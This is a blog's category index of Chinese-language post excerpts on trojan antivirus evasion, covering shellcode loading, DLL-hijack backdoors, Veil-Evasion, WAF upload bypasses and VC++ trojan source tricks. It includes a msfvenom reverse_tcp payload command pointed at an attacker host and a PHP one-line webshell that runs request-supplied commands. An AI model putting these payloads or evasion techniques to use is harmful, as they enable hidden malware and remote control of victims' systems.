随笔分类 -  木马免杀

那些shellcode免杀总结
摘要:首发先知: https://xz.aliyun.com/t/7170 自己还是想把一些shellcode免杀的技巧通过白话文、傻瓜式的文章把技巧讲清楚。希望更多和我一样web狗也能动手做到免杀的实现。 文中我将shellcode免杀技巧分为 "分离“、”混淆“两个大类,通过不同技巧针对不同检测方式, 阅读全文
posted @ 2020-02-07 21:25 卿先生 阅读(13946) 评论(0) 推荐(6) 编辑
VirtualAlloc加载shellcode免杀一点记录
摘要:一个很好的学习网站 推荐一下: https://docs.microsoft.com/zh-cn/windows/win32/api/ 0x01 VirtualAlloc VirtualAlloc: 在虚拟地址空间中预定一块内存区域; VirtualAlloc是Windows提供的API,通常用来分 阅读全文
posted @ 2019-11-13 06:47 卿先生 阅读(3042) 评论(2) 推荐(0) 编辑
域渗透-msdtc实现dll劫持后门
摘要:最近用的多 一个实用小tips 文章参考原创Shadow Force大牛 翻译文章参考三好大佬 利用MSDTC服务加载后门dll,实现自启动后门 后门思路可以查看趋势科技文章 https://blog.trendmicro.com/trendlabs-security-intelligence/sh 阅读全文
posted @ 2019-10-01 20:37 卿先生 阅读(2681) 评论(0) 推荐(0) 编辑
后门木马免杀-msfvenom和msf5(evasion)
摘要:贴上使用笔记 不多介绍了 很简单的东西 msfvenom各平台生成木马大全: windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/sh 阅读全文
posted @ 2019-08-28 07:18 卿先生 阅读(7410) 评论(0) 推荐(0) 编辑
后门免杀工具-Backdoor-factory
摘要:水一水最近玩的工具 弄dll注入的时候用到的 介绍这款老工具 免杀效果一般。。但是简单实用 目录: 0x01 backdoor-factory简介 0x02 特点功能 0x03 具体参数使用 PS:后门添加私钥证书 https://tools.kali.org/exploitation-tools/ 阅读全文
posted @ 2019-08-28 06:10 卿先生 阅读(5928) 评论(0) 推荐(1) 编辑
veil-Evasion免杀使用
摘要:Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payload kali 上并未安装,下面我们来进行简单的安装。我们直接从 github 上进行 clone 下载: git clone [https://www.github. 阅读全文
posted @ 2019-06-16 15:31 卿先生 阅读(3060) 评论(0) 推荐(0) 编辑
一次对php大马的后门的简单分析
摘要:有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次 一共有三个变量,urlget、$un,首先对着几个变量ascii转成字符串,看看是什么,用echo输出即可。 就是个简单的基于base64加gzinflate加密 还原一下: 现在马子的路数很清楚了 通过远程下载主力代码 到 阅读全文
posted @ 2019-05-22 17:42 卿先生 阅读(1493) 评论(0) 推荐(0) 编辑
过waf实战之文件上传bypass总结
摘要:这里总结下关于waf中那些绕过文件上传的姿势和尝试思路 环境 apache + mysql +php waf:某狗waf 这里写了一个上传页面 一般上传 肯定是拦截的 那么接下来就是对绕过waf的一些姿势和思路 1.增大文件大小 测试发现 waf对于Content-Disposition字段的 长度 阅读全文
posted @ 2019-05-08 16:46 卿先生 阅读(3138) 评论(0) 推荐(1) 编辑
PHP安全之webshell和后门检测
摘要:一、各种webshell 一句话木马,其形式如下所示: <?php if(isset(_REQUEST['cmd'])){cmd = (REQUEST["cmd"]);system(cmd); echo "</pre>$cmd<pre>"; die; } ?> <?php if(iss 阅读全文
posted @ 2019-05-06 22:01 卿先生 阅读(9063) 评论(0) 推荐(0) 编辑
PHP后门之冷门回调函数(过waf)
摘要:数据库回调后门 阅读全文
posted @ 2019-05-06 18:16 卿先生 阅读(902) 评论(0) 推荐(0) 编辑
奇淫异巧之 PHP 后门
摘要:整理大部分来源信安之路 对于隐蔽来说,有以下几点要素: 1、熟悉环境,模拟环境,适应环境,像一只变色龙一样隐藏 2、清除痕迹,避免运维发现 3、避免后门特征值被 D 盾等工具检测到 姿势 一般过狗思路 最一般的绕狗、后门思路就是 直接参数回调,将$_REQUEST['pass']传入的数据,传递给 阅读全文
posted @ 2019-05-06 16:07 卿先生 阅读(1958) 评论(0) 推荐(0) 编辑
php中代码执行&&命令执行函数
摘要:转自i春秋 1、eval()函数 那么当我们上传了eval函数的菜刀马之后,在连接不上菜刀的情况下怎么上传大马呢?继续往下看这里我是先写一个上传马,再用上传马去上传大马,有点多次一举,但是考虑到大马代码量太多,还是建议先写个上传马,以下代码只有1kb。 原理是利用文件操作函数如下: 写入xxxx到脚 阅读全文
posted @ 2019-05-06 13:32 卿先生 阅读(28922) 评论(0) 推荐(4) 编辑
webshell之一句话木马变形
摘要:什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提 阅读全文
posted @ 2019-05-05 22:44 卿先生 阅读(3377) 评论(0) 推荐(0) 编辑
vc++源码免杀特殊技巧
摘要:一、Debug 和 Release 编译方式的区别: Debug 通常称为调试版本,它包含调试信息,并且不作任何优化,便于程序员调试程序。Release 称为发布版本,它往往是进行了各种优化,使得程序在代码大小和运行速度上都是最优的,以便用户很好地使用。 Debug 和 Release编译方式在木马 阅读全文
posted @ 2019-05-05 17:40 卿先生 阅读(1532) 评论(0) 推荐(0) 编辑
vc++中字符串的免杀
摘要:一:格式字符: http://baike.baidu.com/view/2194593.htm d:以十进制形式输出带符号整数(正数不输出符号)o:以八进制形式输出无符号整数(不输出前缀o)x:以十六进制输出无符号整数(不输出前缀0x)s:输出字符串 二:字符串免杀的几种方法 以后如果你定位到特征码 阅读全文
posted @ 2019-05-04 18:46 卿先生 阅读(754) 评论(0) 推荐(0) 编辑
vc++中代码段的免杀
摘要:一、文件特征码定位: 一般我们先用MyCCL把被查杀文件的文件特征码定位出来,然后用C32判断定位出来的这个特征码是代码还 是字符串,或者是输入表、输出表、版权信息等…定位在不同的地方,就要用不同的方法来进行源码免杀。 如果特征码定位木马服务端的代码里,那么我们就把这个木马用OD载入,然后把特征码旁 阅读全文
posted @ 2019-05-04 18:40 卿先生 阅读(891) 评论(0) 推荐(0) 编辑
vc++木马源码免杀一些常用方法
摘要:1.字符串连接 ////////////////////////////////////////////////////////////把字符串"canxin"连接起来(字符串连接法) //这样就实现了str3=str1+str2,把str1和str2连接起来了/////////////////// 阅读全文
posted @ 2019-05-04 18:31 卿先生 阅读(1255) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示